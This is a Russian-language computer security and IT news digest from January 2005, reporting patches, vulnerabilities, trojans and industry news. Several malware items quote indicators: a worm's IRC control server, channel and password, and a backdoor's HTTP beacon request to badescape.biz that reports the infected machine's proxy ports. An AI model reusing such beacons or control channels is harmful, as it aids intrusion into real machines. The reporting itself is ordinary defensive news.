Как мы и писали Microsoft выпустила 3 бюллетеня по безопасности: MS05-001, -002, -003. Первый из них латает уязвимость в HTML Help ActiveX (наконец-то), об уязвимости которого мы сообщали в прошлом году. Предназначен для ОС: Windows 2000, Windows Sever 2003 (в том числе 64-битной версии) и Windows ХР (в том числе и с SP2!). Второй описывает (и латает) уязвимость в ANI-файлах (файлы курсоров и иконок) и предназначен для ОС: Windows NT Server 4.0, Windows 2000, Windows XP и Windows Server 2003. Третий бюллетень описывает уязвимость в службе индексации (Indexing Service) Windows 2000/ХР/Server 2003. Атакующий может послать специальным образом сформированный запрос, при обработке которого может произойти DoS.
MS05-001
MS05-002
MS05-003

12/01/2005 15:13 Apple продемонстрировала систему локального поиска Spotlight
Стив Джобс рассказал о будущей встроенной поисковой машине Apple, которая, по его словам, превосходит конкурирующие продукты от Google и Microsoft. Не отставая от рынка РС, Apple готовит к предстоящему выпуску обновления Mac OS X средства локального поиска. В частности, Джобс уверяет, что у Apple есть очень хорошие предпосылки для создания технологии поиска файлов, затерянных в дебрях операционной системы, и она занимает в этой области выгодное положение по сравнению с такими конкурентами, как Google, которая недавно объявила о работе над поисковым инструментом для Мас. «Введение этого инструмента в операционную систему позволяет делать то, что недоступно извне», — сказал Джобс, выступая во вторник со своим традиционным ежегодным докладом на выставке Macworld Expo в Сан-Франциско. В июне Apple представила новую технологию поиска Spotlight, которая должна войти в следующую версию операционной системы, Tiger. В ноябре на своем веб-сайте компания подробнее рассказала о том, как работает эта технология. Джобс продемонстрировал некоторые возможности системы и сказал, что обновление выйдет в первом полугодии 2005 года. «И это будет задолго до Longhorn», — подчеркнул он. Longhorn, следующая версия операционной системы Windows, в которую должна войти шумно разрекламированная Microsoft технология локального поиска, намечена к выпуску на второе полугодие 2006 года. Spotlight представляет собой механизм индексации, который отслеживает каждый файл при его создании, открытии, изменении, копировании или удалении. Постоянно наблюдая за всеми файлами, включая их полное содержание, Spotlight может быстро и эффективно разыскивать файлы по первому пожеланию пользователя. Например, пытаясь вспомнить, куда вы записали информацию о путевках к предстоящему отпуску, достаточно будет просто набрать «Ямайка» или «отель», и Spotlight услужливо откроет файлы с этими словами
Подробное описание

12/01/2005 15:00 Microsoft выпустила новый пакет важных "заплаток" для Windows
Компания Microsoft во вторник 11 января выпустила новый пакет обновлений систем безопасности для большинства ОС семейства Windows (от старой Windows 98 до новейших версий Windows XP SP2). Обновления имеют статус "критичных", что символизирует самую высокую степень потенциальной опасности. Это означает, что в ОС были найдены очередные "дыры", которые позволяют вирусам и троянским программам получить контроль над уязвимым компьютером. Старые и уже распространившиеся вирусы не могут проникать в компьютеры через новые дыры. Это смогут делать только новые вирусы, которые, вероятнее всего, появятся в ближайшее время или уже появились, но мало распространены. Если не установить обновления ("заплатки") от Microsoft, такие вирусы смогут заразить компьютер и нанести ему вред. Главная из найденных уязвимостей касается не только ОС, но и популярного браузера Internet Explorer - дыра позволяет получить контроль над системой при посещении специально составленной хакерской интернет-страницы, на которую злоумышленники могут пользователя заманить. Другая уязвимость касается возможности выполнения несанкционированного кода при работе с специальным образом созданными курсорами и системными значками (злоумышленники могут также привлечь пользователя, предложив ему поменять стандартные системные значки и курсоры на "необычные"). Традиционно, для того, чтобы установить обновления ОС, необходимо посетить сайт Windows Update (он работает только с браузером Internet Explorer). Как известно, в последнее время ситуация с безопасностью в Интернете постоянно ухудшается, и компьютерные компании стараются привлечь внимание рядовых пользователей к этой проблеме. Microsoft в самое ближайшее время собирается выпустить для пользователей Windows бесплатную программу для диагностики и устранения наиболее известных и вредных вирусов и уязвимостей системы. В настоящее время подобную бесплатную услугу уже предлагает известная софтверная компания Symantec, создавшая онлайновую систему проверки безопасности компьютера Symantec Security Check.
Cайт Windows Update

11/01/2005 18:01 IBM дарит миру 500 патентованных технологий
Руководство американской корпорации IBM заявило, что собирается "открыть" 500 патентов, которыми она владеет, разрешив бесплатно использовать их всем разработчикам программного обеспечения, сообщает Lenta.Ru. Согласно пресс-релизу, опубликованному на сайте корпорации, программами, которые входят в этот перечень, может воспользоваться любой человек, сообщество или организация, которые занимаются созданием программного обеспечения или используют его в своей работе, а также согласны с критериями открытых исходных кодов, определенными компанией Open Source Initiative. Как утверждает IBM, это будет самый большой пакет патентов в любой отрасли, переданный в открытое пользование. Эта акция знаменует собой изменения в управлении интеллектуальным имуществом корпорации. Пакет патентов IBM только за последний год вырос на три тысячи единиц, причем такое количество свидетельств она получает четвертый год подряд. В настоящее время корпорация является крупнейшим держателем патентов не только в области информационных технологий, но и в других областях, являясь единственной компанией, которая получает более двух тысяч патентов в год. По словам представителей IBM, эта раздача патентов не станет единовременной акцией - корпорация намеревается в будущем периодически отдавать программистам защищенные технологии для бесплатного использования.
Список в PDF

11/01/2005 16:15 Acronis и "1С" предложили новое решение для защиты серверов
Компания Acronis и фирма «1С» объявили о выходе в свет новой версии популярного решения для полного резервного копирования, хранения данных и восстановления работоспособности серверов — Acronis True Image 8.0 Server для Windows. Acronis True Image — комплексное решение для полного резервного копирования, хранения данных (в том числе и в сетевых системах хранения), обеспечения безопасности и восстановления работоспособности серверов. Используемая в продукте технология Acronis Drive Snapshot позволяет создавать резервные образы жесткого диска или дисков сервера непосредственно во время работы в MS Windows, не требуя перезагрузки системы и не прерывая ее работы ни на минуту. Резервный образ диска представляет собой файл, включающий абсолютно все данные, в том числе загрузочные записи, операционную систему, приложения, файлы с данными, электронную почту, обновления системы, а так же любые другие данные, находящиеся на жестких дисках сервера. Созданный образ может быть размещен на медиа-носителях практически любого типа — жесткие диски (данного сервера, других серверов подключенных к сети, сетевых систем хранения данных), CD, DVD, ленточные накопители и т.п. В случае любого сбоя, например, вирусной атаки или других фатальных ошибок программного и аппаратного обеспечения все содержимое жестких дисков сервера может быть легко и быстро восстановлено из его образа в обычное рабочее состояние, даже в ситуациях, когда обычные средства резервного копирования файлов не помогают. При этом простой сервера сводится к минимуму.
CNews

11/01/2005 15:03 Нацбол осужден за сайт, содержащий оскорбления в адрес Президента
Мировой суд Центрального района Красноярска огласил приговор по делу руководителя местного отделения Национал-большевистской партии России 24-летнего Андрея Сковородникова. Господин Сковородников отличился тем, что 22 февраля 2004 г. создал в Интернете сайт с нецензурной бранью в адрес президента (на сайте находилось изображение женского обнаженного тела с головой Путина и подписью "п#дор Путин"). В тот же день в его квартиру постучали сотрудники спецслужб, обнаружившие в компьютере файлы с оскорбительными текстами в адрес Владимира Путина. Против создателя было возбуждено уголовное дело по ст. 319 УК РФ ("Оскорбление представителя власти"). Тогда же специалист-филолог Красноярского госуниверситета провел экспертизу сайта Сковородникова и подтвердил, что на нем содержатся оскорбительные высказывания. В итоге вчера судья счел доводы прокуратуры, доказывающей вину "лимоновца", обоснованными и приговорил Сковородникова, так и не признавшего себя виновным, к шести месяцам исправительных работ с удержанием в доход государства 20% ежемесячного заработка. Кроме того, суд вынес решение об уничтожении компьютера, пяти дискет и трех дисков, изъятых при обыске у лидера красноярских "лимоновцев" (прим. ньюсмейкера: интересно, а сам компьютер, равно, как и "железо" в чём виноваты-то?). После вынесения приговора Андрей Сковородников заявил, что это "свидетельство культа личности Путина", и сообщил, что готов обжаловать его в судах все инстанций. При этом он пока не задумывается, как и где будет исполнять наказание: "А мне это безразлично. Официально я безработный, и никакой суд не может заставить меня устроиться на работу".
Ytro.Ru

11/01/2005 14:02 Свободная книга по сетевым технологиям
Eugene Blanchard открыл свободный доступ к своей книге "Introduction to Data Communications", сообщает opennet.ru. В 63 главах книги отражены следующие темы: модемы, кабельное хозяйство Ethernet, RS-232, телефония, ISO-модель, IEEE-802.3, IEEE 802.2 LLC, TCP/IP, X.25, Frame Relay, введение в Unix и аппаратные маршрутизаторы.
Книга

11/01/2005 13:23 Уязвимость в Squid
Обнаружена уязвимость в популярном ПО Squid, применяемом в мире открытых систем для организации услуг сервера-посредника (прокси-сервера). Связана с возможностью утечки памяти и некорректном механизме работы с памятью компоненты "fakeauth_auth" helper (исходный файл "fakeauth_auth.c) при обработке сообщений NTLM-аутентификации NTLM type 3. Подобная ситуация может возникнуть либо при очень высокой загрузке сервера, либо при очень длительном периоде работы (что является довольно типичной ситуацией в мире UNIX-серверов). Кроме того, удалённый атакующий может послать специально оформленное сообщение NTLM type 3 ии вызвать ошибку сегментации памяти. Тем не менее, масштаб атаки ограничен локальной сетью, ибо ни один нормальный сисадмин в здравом уме не допустит NTLM-аутентификации снаружи. Пат для версии 2.5.STABLE7 выпущен.
Подробности

11/01/2005 12:44 Локальные уязвимости в Windows
Cesar Cerrudo из Application Security, Inc. обнаружил уязвимости в семействе ОС Windows, которая позволяет локально повысить привилегии в системе. Первая уязвимость присутствует в сервисе LPC (Local Procedure Call) - механизме, предназначенном для локального взаимодествия процессов (в отличие от RPC - Remote Procedure Call). API, который используется клиентом для соединения с локальным портом серверного процесса (создаётся API NtCreatePort) NtConnectPort позволяет создавать буфер, преышающий 260 байт. При использовании этой функции буфер памяти, копируемой от клиента к серверу ядром, игнорирует ограничения размера буфера, устанавливаемые API NtCreatePort при создании серверного сокета. Это может вызвать повреждение кучи в серверном процессе, что, в свою очередь может привести к перезаписи произвольной области памяти с дальнейшим выполнением произвольного кода в пространстве памяти ядра. Уязвимости подвержены все версии Windows: NT/XP/2K/2003. Уязвимости не подвержены версии 98/98SE/ME. Необходимо отметить, что патч MS04-044, латающий дыру, был выпущен M$ ещё 14 декабря прошлого года. Вторая уязвимость связана с механизмом назначения и обработки та называемых "токенов" в ОС Windows и механизме работы, который получил название "Impersonate a client after authentication" (появился в Win2K после 4-го сервис-пака, в XP после SP2, присутствует в Win2003). Использование уязвимости позволяет получить доступ (локально) к сетевым ресурсам, досутп к которым имеет только администратор (\computernamec$), а также ко всем файлам и билиотекам, доступ к которым в обычных условиях строго ограничен. Опять же для организации вектора атаки используется печально знаменитая служба LSASS (Local Security Authority Subsystem Service), а точнее - применяемый ей механизм кеширования. Особой опасности подвержены серверы на которых примеяется сервис терминальных служб (или Citrix). Для устранения уязвимости опять же применяется патч, описанный в бюллетене MS04-044.
Описание первой уязвимости
Описание второй уязвимости

11/01/2005 12:25 McAfee выпустила программу для поиска закрытой информации на сайтах
Компания McAfee, известная своими антивирусными продуктами, выпустила обновленную программу SiteDigger, которая предназначена для администраторов сайтов, хранящих конфиденциальную информацию и желающих проверить, не получили ли доступ к ней поисковые системы. Современные поисковые системы (как известно, среди них лидирует Google.com), способны обнаружить информацию, которую авторы сайта не собирались делать публичной. Если защита информации не обеспечена должным образом, индексирующий робот Google, быстро перебирающий возможные варианты адресов, может найти такую информацию, проиндексировать и сделать для себя копию, в результате чего она окажется доступна всем через результаты поиска. Связанные с этим инциденты возникают регулярно, так как в открытый доступ через архив ("кэш") Google периодически попадают различные идентификационные данные, не подлежащие огласке документы и информация, распространяемая только за деньги. Так, в конце прошлого года на Google подал в суд владелец американской порностудии, обвинявший поисковик в том, что в система поиска изображений Image Search содержатся уменьшенные копии фотографий, произведенных его фирмой и свободному распространению не подлежащих. Для того, чтобы это предотвратить, в одном из подразделений McAfee - компании Foundstone - и был создан SiteDigger. Он, подобно поисковику, перебирает возможные запросы к определенному сайту и выявляет, что именно можно таким образом получить, чтобы авторы сайтов могли бороться с утечками. SiteDigger распространяется бесплатно. Хотелось бы только обратить внимание, что для работы с инструментом, необходимо получить лицензионный ключ для работы с API Web-поиска Google. Да и количество авторизованных запросов при этом ограничено 1000 в день.
О программе

11/01/2005 11:23 Новые трояны распространяются в видеофайлах
Аналитики PandaLabs сообщили о появлении двух новых троянцев: Trj/WmvDownloader.A и Trj/WmvDownloader.B, которые распространяются через пиринговые (P2P) сети в видеофайлах. Эти троянцы пользуются новой технологией в составе Microsoft Windows Media player под названием Windows Media Digital Rights Management (DRM), разработанной для защиты прав интеллектуальной собственности на мультимедийный контент. Когда пользователь пытается проиграть защищенный файл Windows media, эта технология запрашивает действующую лицензию. Если лицензия не сохранена на компьютере, приложение будет искать ее в интернете. Новая технология входит в состав обновления Windows XP Service Pack 2 + Windows Media Player 10. Видеофайлы, зараженные такими троянцами, имеют расширение .wmv и защищены лицензиями, якобы выданными компаниями Оverpeer (в случае с Trj/WmvDownloader.A), и Рrotectedmedia (в случае Trj/WmvDownloader.B). Если пользователь запускает видеофайл, который заражен одним из этих троянцев, они создают видимость скачивания соответствующей лицензии с определенных веб-страниц. Однако в реальности они перенаправляют пользователя на другие интернет-адреса, с которых загружают большое количество рекламных программ (выводящих рекламные сообщения на экран), программ шпионов, дозвонщиков (приложений, которые подсоединяются к дорогостоящим телефонным линиям) и других вирусов. Новые троянцы обнаружены в видеофайлах с варьирующимися названиями, которые загружаются через такие пиринговые сети, как KaZaA или eMule. Также они могут распространяться другими способами, например в виде вложений в электронных письмах, на флоппи-дисках, компакт-дисках, скачиваться с FTP и т.д.
Источник

11/01/2005 10:17 FreeBSD теряет лицензию на Java?
Как сообщает FreeBSD Foundation, разработчик известной UNIX платформы для PC, продолжающиеся постоянные изменения в Sun Microsystems затрудняют взаимодействие с лицензионной программой компании, по словам FreeBSD Foundation, недавно поступило уведомление от Sun Microsystems об отказе в продлении лицензии SCSL на Java для платформы FreeBSD. В то же время Sun Microsystems выпустил краткое заявление, где отвергается отзыв лицензии на Java у FreeBSD Foundation. По словам Sun, речь идет всего лишь об обновлении лицензии.
CNews

11/01/2005 09:50 Apple собирается покорить массовый рынок "народным" "Макинтошем"
Компания Apple намеревается в наступившем году продолжить освоение массового компьютерного рынка, выпустив несколько новых продуктов. Как ожидается, они будут представлены на ежегодной выставке Macworld Expo, которая открывается во вторник в американском городе Сан-Франциско. До официального представления новых разработок Apple отказывается сообщать о них что-либо, более того, эти сведения являются коммерческой тайной. Тем не менее, в конце минувшего года информация о планах компании попала в распоряжение издания Think Secret, которое рассказало читателям, что главный революционный продукт Apple - это массовый персональный компьютер серии iMac стоимостью ниже 500 долларов. Как известно, компьютерная платформа Macintosh исторически считается "элитной" (более качественной, надежной и стабильной), такие компьютеры стоят дорого (самая дешевая модель линейки eMac стоит 799 долларов), и работают на них, в основном, представители некоторых отдельно взятых отраслей бизнеса (например, дизайнеры и издатели), для короых эта платформа считается наиболее подходящей. Появление нового "народного" iMac способно изменить ситуацию в сторону увеличения рыночной доли платформы Macintosh и разработанных для нее операционных систем серии MacOS. По информации Think Secret, новая модель имеет кодовое название Q88 и будет работать на процессоре PowerPC G4 с частотой 1,25 гигагерц. Она будет выполнена в тонком корпусе, который будет удобно размщать на рабочих местах, например, спрятав его за монитор.
Подробности

10/01/2005 18:48 Ошибка в gmail
Бесплатный почтовый сервис Gmail компании Google имеет уязвимость, в следствие которой почта может быть доставлена не по адресу. Если Вы зарегистрировали email адрес со спецсимволами типа 'John.Smith@gmail.com', то вы с большой вероятностью сможете получать почту предназначенную для 'JohnSmith@gmail.com', похожего адреса, но только без спецсимвола. Однако, было замечено, что почта, отправленная с gmail аккаунтов на адреса со спецсимволами доставляется нормально. Случайное открытие сделал американский инженер, когда стал получать почту с другого аккаунта. Ошибку подтверждает и ресурс WebHosting.Info. Google отреагировал на это запретом на регистрацию email адресов со специальными символами.
Источник

10/01/2005 16:12 Microsoft ActiveSync 3.8: новая версия программы синхронизации для Windows Mobile Pocket PC устройств
В сети интернет появилась новая версия программного обеспечения используемого для синхронизации с компьютером Windows Mobile Pocket PC устройств. В новой версии программы Microsoft ActiveSync 3.8 появилась функция оповещения пользователя об устройствах подключенных впервые или исключенных из списка синхронизируемых устройств. Также теперь функция Remote PC Sync (синхронизация через Wi-Fi или по локально сети) по умолчанию отключена.
Более подробно

10/01/2005 15:53 Уязвимость CIFS в Novell Netware
Служба CIFS.NLM в NetWare 5.1 и 6.0 оказалась подвержена DoS-атаке случайными данными (в локальной сети). Разработчиком выпущено исправление.
Подробности и исправление

10/01/2005 15:45 Кучма подписал закон об ответственности за «хакерство»
Президент Украины Леонид Кучма подписал закон “О внесении изменений в Уголовный и Уголовно-процессуальный кодексы Украины” (относительно ответственности за преступления в сфере использования компьютеров). Об этом сообщили в пресс-службе президента Украины. Согласно закону, статья 361 Уголовного кодекса Украины изложена в новой редакции, в соответствии с которой уголовная ответственность будет наступать за несанкционированное вмешательство в работу ЭВМ (компьютеров), автоматизированных систем, компьютерных сетей или сетей электросвязи, что привело к: утечке; потере; подделке; блокированию информации; искажению процесса обработки информации; нарушению установленного порядка ее маршрутизации. Одновременно Уголовный кодекс дополняется новыми статьями, которые устанавливают ответственность за: создание с целью использования, распространения или сбыта вредных программных или технических средств, а также их распространение или сбыт (ст. 361-1); несанкционированный сбыт или распространение информации с ограниченным доступом, которая хранится в ЭВМ (компьютерах), автоматизированных системах, компьютерных сетях или на носителях такой информации (ст. 361-2); препятствие работе электронно-вычислительных машин (компьютеров), автоматизированных систем, компьютерных сетей или сетей электросвязи путем массового распространения сообщений электросвязи (ст. 363-1). Законом также предусмотрено применение к виновному лицу, совершившему любое из вышеуказанных преступлений, конфискации программных или технических средств, с помощью которых было совершено преступление и которые являются собственностью виновного лица. Изменения в Уголовно-процессуальный кодекс позволят проводить досудебное следствие по вышеуказанным статьям следователями СБУ.
Источник

10/01/2005 13:56 Skulls.D: новый Symbian OS троянец маскируется под Macromedia Flash
На сайте компании Macromedia, cообщает mobile-review.com, выложено свежее предупреждение MPSB05-01 - Skulls.D Trojan Using "Macromedia Flash" As Name, в котором, со ссылкой на компанию F-Secure, сообщается о появлении нового троянца Skulls.D под Symbian OS, распространяемого под видом файлов Flash_1.1_Full_DotSiS.sis, Macromedia_Flash_1.1_Full_DotSiS.sis и схожих вариантах. Разумеется, к появлению и распространению этих файлов сама Macromedia никакого отношения не имеет, компания лишь предупреждает о недопустимости исполнения этих файлов.
Описание трояна

10/01/2005 13:37 Поиск Би-би-си отвечает на странные вопросы
Система поиска сайта Би-би-си в 2004 году использовалась рекордное количество раз, помогая людям находить ответы как на простые, так и на странные вопросы. Более 45 миллионов человек воспользовались поиском и задали более 277 миллионов вопросов. Больше всего читателей Би-би-си в 2004 году интересовали, среди прочего, игры, сериал EastEnders, проект для детей Си-би-би-си, умерший в прошлом году легендарный ди-джей Джон Пил, Гарри Поттер и Олимпиада. Но было и много странных вопросов. Например: что такое собака, как произносится слово баскетбол, или какая коллекция грязи, скапливающейся в пупке, самая крупная. В ушедшем году поисковой системой, помогающей людям находить материалы Би-би-си и другие страницы в интернете, находящей ответы на вопросы или просто показывающей соответствующие сайты, пользовались на 34% чаще, чем в 2003 году, а количество пользователей возросло на 44%. Ниже приведены некоторые из наиболее странных запросов, поступивших в систему за 2004 год.
* Как сложить салфетку в форме ботинка эльфа?
* Как структурировать французское письмо?
* Что лучше - один длинный отпуск каждый год, или несколько коротких отпусков в течение года?
* Что такого особенного в швейцарцах?
* Каковы современные проблемы медсестер?
* Что значит цифра 4 в числе 40052308090?
* Что происходит?
* Как зовут собаку [шеф-повара и телеведущего] Джеймса Мартина?
BBC

10/01/2005 12:32 Современные антиспамерские технологии резко увеличили нагрузку на корневые DNS сервера
Меры, принимаемые интернет-организациями всего мира для борьбы со спамом, имеют негативный побочный эффект - внедренные антиспамерские технологии и ответные действия спамеров привели к существенному увеличеннию нагрузки на мировые DNS-серверы. К такому выводу, как сообщает издание Lenta.ru со ссылкой на eWEEK, в последнее время приходят многие специалисты по интернет-безопасности. DNS-серверы предназначены для преобразования доменных имен (адресов сайтов) в цифровые IP-адреса, с помощью которых компьютеры в Интернете находят друг друга. DNS (Domain Name System) - сложная иерархическая система, состоящая из DNS-серверов различного уровня, отвечающих за те или иные доменные зоны. Она считается одной из основ строения Интернета. Когда тот или иной компьютер собирается найти какой-либо сайт по его "буквенному" адресу, он первым делом обращается к ближайшему DNS-серверу, который либо сразу указывает ему нужный IP-адрес, либо перенаправляет на другие серверы, которые ищут нужный адрес исходя из доменного имени - от верхнего уровня к нижнему. Например, для преобразования в цифровой адрес домена, находящегося в национальном российском домене верхнего уровня .ru, необходимо обратиться к серверам национального регистратора RU-CENTER, которые для дальнейшего распознавания укажут на DNS-серверы провайдера, ответственного за домен следующего уровня. Спамеры и прочие компьютерные злоумышленники часто применяют технологии подстановки несуществующих или неверных доменов, чтобы "замести следы". Почтовые серверы, обрабатывающие проходящие через них сообщения, как правило, постоянно проверяют соответствие доменов и IP-адресов, хотя в современном Интернете такая проверка потеряла изначальный смысл, так как многие провайдеры, используя современные технологии, "привязывают" к одному IP-адресу множество доменов, зарегистрированных клиентами. Тем не менее, почтовые машины продолжают генерировать огромное количество почти бесполезных DNS-запросов, число которых доходит до 30 за одно сообщение. Ситуацию особенно усугубляет неизбежное при спам-рассылках появление сообщений об ошибках (когда сообщения не доставлены или задержаны), которые генерируются автоматически в огромных количествах и рассылаются адресатам, порождая новые потоки DNS-запросов.
Подробности

10/01/2005 10:57 Демонстрация уязвимости Internet Explorer
На сайте датской компании Secunia создана страница, которая демонстрирует уязвимость в Internet Explorer 6 c WinXP SP2. Как написано на сайте, уязвимость присутствует, если откроется новое окно IE со страницей сайта Secunia. Необходимым условием также является инсталляция дистрибутива в стандартное место - c:/windows.
Демонстрация

10/01/2005 09:12 В поисках зрительской аудитории
На выставке Consumer Electronics Show Билл Гейтс объявил о сделке с TiVo. Первым выступив на открытии выставки Consumer Electronics Show (CES) в Лас-Вегасе, председатель правления Microsoft анонсировал партнерство с компанией TiVo, направленное на дальнейшее развитие стратегии Microsoft в области цифровых медиа. Пионер цифровой записи телепередач кооперируется с Microsoft в рамках своего нового проекта TiVoToGo по созданию мобильных версий записанных при помощи TiVo программ. Эта служба позволит владельцам последних моделей устройств TiVo пересылать программы на ПК под Windows ХР, откуда их можно будет в свою очередь вещать на портативные устройства Microsoft, такие как видеосистемы Portable Media Center и мобильные телефоны Smartphone. Гейтс начал с того, что рассказал о стратегии Microsoft в области цифровых медиа. По его словам, Microsoft будет продолжать работу в направлении объединения цифровых технологий. «Сегодня в гостиной можно увидеть пять разных пультов дистанционного управления, и все равно нельзя слушать музыку там, где хочется». Презентация омрачилась несколькими техническими неполадками, включая проблемы при запуске слайд-шоу на Windows XP Media Center и при демонстрации игры Xbox, которая внезапно прервалась синим экраном с сообщением об ошибке обращения к памяти. «Сейчас будет уволено девять человек, — пошутил после первого сбоя ведущий Конан О’Брайан. — Кто здесь отвечает за Microsoft?»
Более подробно

8/01/2005 16:16 Интернет-банки грабили с помощью компьютерного вируса
Четверо учащихся средней школы в Сиднее (Австралия) обвиняются в международном интернетовском мошенничестве, которое затеяли русские хакеры. Они украли онлайновые банковские пароли нескольких человек и "перекачали" их наличные средства на счета в Восточной Европе, говорится в сообщении полиции. Полиция штата Новый Южный Уэльс отказывается назвать имена несовершеннолетних мошенников по юридическим причинам. Известно лишь, что все они в возрасте 15-17 лет. Этим четырем учащимся были обещаны проценты от прибыли за то, чтобы они позволили воспользоваться их счетам в банке для отмывания средств, полученных незаконным путем. Деньги воровались из Интернет-банков с помощью компьютерного вируса, который тайно делал записи паролей, отмечает полиция. По их словам, 13 австралийцев, включая учащихся, обвиняются в ограблении предположительно 61-го человека. Пока доказано воровство, по меньшей мере, 600.000 австралийских долларов (457.000 долларов США). Общая сумма может, в конечном счете, составить несколько миллионов, подчеркивает представитель полиции. В ближайшие несколько недель ожидаются новые аресты.
Crime-Research.Ru

8/01/2005 15:05 Анализ червя, использующего уязвимость WINS
Червь, который использует уязвимость, обнаруженную в службе WINS (MS04-045), обнаружен в диком виде и назван антивирусной компанией Troj/Winser-A. Stephen J Friedl проанализировал исходный код червя и поделился с остальным секьюрити-сообществом результатами своего анализа. Файл, заражающий компьютер имеет название ccEvtMngr.exe (139КБ), маскируется в системе под именем ccevtmgr, службой, под именем которой обычно выступает Symantec Event Manager Service. Заражённые машины управляются с IRC-сервера irc.bel3c.com, с которым заражённая машина соединяется, выходя на канал #shhplz с паролем nono. С более подробным анализом, а также с файлами трояна желающие могут ознакомиться, посетив приведённую ниже ссылку.
Анализ трояна

8/01/2005 13:27 Локальная уязвимость в ядрах Linux
Paul Starzetz из польской iSEC Security Research сообщает об обнаружении уязвимости в ядрах Linux (до 2.4.29-pre3 и 2.6.10). Уязвимость присутствует в функции sys_uselib(), используемой в ядре загрузчиком для загрузки библиотек в зависимости от типа применяемых бинарных форматов файлов (более старый - a.out и более новый - ELF) - тип и стриуктура преобразования описываются в файле binfmt_elf.c. Используя код эксплоита, который также опубликован Полем, можно повысить полномочия в системе до суперпользователя. Попутно автор обвинил Stefan Esser из немецкой группы Ematters в плагиате - тот, якобы опубликовал исходный код эксплоита, автором которого на самом деле является Поль (или Павел).
Описание уязвимости

8/01/2005 13:11 Самые маленькие p2p-приложения
Дмитриq Леонов (Bugtraq.Ru) cообщает на своём сайте о самых маленькие p2p-приложения - одно на Питоне, второе - на Перле. Приложение на Питоне уместилось в 15 (!) строчек кода и обеспечивает функциональность сервера либо клиента, для передачи данных использует стандартные протоколы HTTP и XML-RPC (и, соответственно, кучу стандартных библиотек, но все равно результат впечатляет). Написано в качестве демонстрации простоты создания p2p-приложений и, соответственно, бессмысленности их запрета. Альтернативный пример на Perl - MoleSter 0.0.4, в два побил TinyP2P, не используя при этом ничего кроме чистых сокетов.
Приложение на Питоне
MoleSter
MoleSter в более читабельном виде

8/01/2005 11:49 Уязвимости в Exim
О существовании уязвимостей в популярном MTA Exim сообщает английская компания iDEFENSE, Inc. Первая уязимость имеет локальный характер и присутствует в механизме обработки элементов, передаваемых этой функцией для размещения в массиве фиксированной длины. Параметры, передаваемые функции могут быть вызваны из командной строки. использование уязимости позволяет получить полномочия пользователя, от имени которого вызывается MTA. Несмотря на то, что Exim выполняется с SUID, уязвимость не позволяет получить права суперпользователя, поскольку эти полномочия сбрасываются до выполнения уязвимого кода. Вторая уязвимость имеет уже удалённый характер и связана с использованием функции auth_spa_server(), в которой не проверяется длина вводимых данных функции spa_base64_to_bits(), которая декодирует строку, закодированную в BASE64, в буфер фиксированной длины. В этом случае, атакующий может получить удалённый доступ с UID пользователя, от имени которого запускается MTA. Тем не менее, уязвимость имеет место только в том случае, если в мейк-файле (Local/Makefile) при сборке пакета был задан параметр AUTH_SPA=yes, задающий метод аутентификации SPA. Уязвимость присутствует в версиях 4.40, 4.41, 4.42. Чтобы обнаружить, обладает ли MTA уязвимостью, необходимо подключиться к 25-му порту почтового сервера (SMTP) и выдать команду: EHLO localhost. В случае наличия в выходных данных AUTH NTLM сервер уязвим. Разработчиками выпущен патч для версии 4.23. Также утерждается, что в планируемой к выпуску версии 4.50 уязимость будет убрана.
Первая уязимость
Вторая уязвимость

8/01/2005 10:34 Уязвимость в Mozilla
В период, когда вся передовая российская общественность "наслаждается" внезапно образовавшимся 10-дневным праздником, наши европейские коллеги на почве компьютерной безопасности трудятся, не покладая рук. Так, Luca Ercoli из Италии, опубликовал сообщение об обнаружении уязвимости в популярном браузере Mozilla. Уязвимость присутствует в механизме обработки графических файлов формата XBM(X BitMap). Данные этих файлов содержатся в памяти в ASCII-формате, при этом файл начинается с оператора '#define', один из которых (#define file_name_width XX) определяет ширину рисунка (в пикселях), а второй (#define file_name_height XX) - высоту. При открытии файла Mozilla размещает эти данные в памяти, чтобы поместить в ней весь рисунок. Как обнаружил автор, в случае задания очень больших значений этих данных можно вызвать аварийное завершение приложения. Уязвимость может быть вызвана как через E-mail (при помощи мейл-клиента Mozilla), так и при посещении специальным образом оформленной Вэб-страницы. Уязвимость проверена в версии 1.6 для Windows. Версия для Linux уязвимости не подвержена. Автором подготовлена страница с демонстрацией уязвимости.
Демонстрационная страница

7/01/2005 20:04 MS запустила бета-тестирование AntiSpyware
Как и обещалось, менее чем через месяц после покупки Giant Microsoft объявила о доступности бета-версии Microsoft Windows AntiSpyware, представляющей собой по сути перепакованный вариант Giant AntiSpyware, cообщает Bugtraq.ru. Бета-версия распространяется бесплатно и не требует регистрации (хотя при скачивании и проверяет систему на легальность). Столь быстрый выпуск довольно любопытен - после аналогичной покупки румынской антивирусной компании прошло уже полтора года, но сроки выпуска антивируса от MS пока остаются очень предположительными. Как сообщает дальше Дмитрий Леонов на bugtaq.ru, первое впечатление от программы очень неплохое. Сканирование идет немного с перестраховкой, в качестве возможных угроз могут, к примеру, опознаваться p2p-клиенты и ftp-cерверы. Впрочем, при этом дается исчерпывающее описание возможной угрозы, предлагаемые по умолчанию действия вполне разумны, так что люди, установившие подозрительный с точки зрения сканера софт, должны быть в состоянии адекватно отреагировать на сообщения программы, к тому же при последующих сканированиях реакцию на них можно отключить. Порадовала очень подробная настройка системного мониторинга, позволяющего следить за полусотней с лишним событий, разбитых на три группы (Internet, System, Applications) - от модификаций списка программ, стартующих вместе с системой, до изменений параметров tcp/ip.
Подробнее о программе

7/01/2005 11:47 Новый троянец Backdoor.Tjserv.C
Symantec сообщает о появлении нового троянца под названием Backdoor.Tjserv.C. После того, как он был запущен (не без участия пользователя, естественно) - открывает в системе HTTP и SOCKS 5 прокси-сервер на случайно выбранном порту. Также добавляет значение "tjstartup" = "[path to executable]" в традиционный ключ автозапуска HKLMSoftwareMicrosoftWindowsCurrentVersionRun. Номера открываемых портов содержатся в ключах: HKCUSOFTWARE jserverssp_socks5, HKCUSOFTWARE jserverssp_http. После заражения компьютер посылает GET-запрос на сервер badescape.biz на порт 2080 для внесения IP-адреса заражённого компьютера в базу данных вида:
GET /tenge/hit.php?port=XXX&hport=YYY HTTP/1.0,
где XXX-порт SOCKS 5 - прокси, а YYY-порт HTTP-прокси. Распространяется среди всех видов Windows.
Описание троянца

7/01/2005 10:27 Уязвимость в Norton AntiVirus
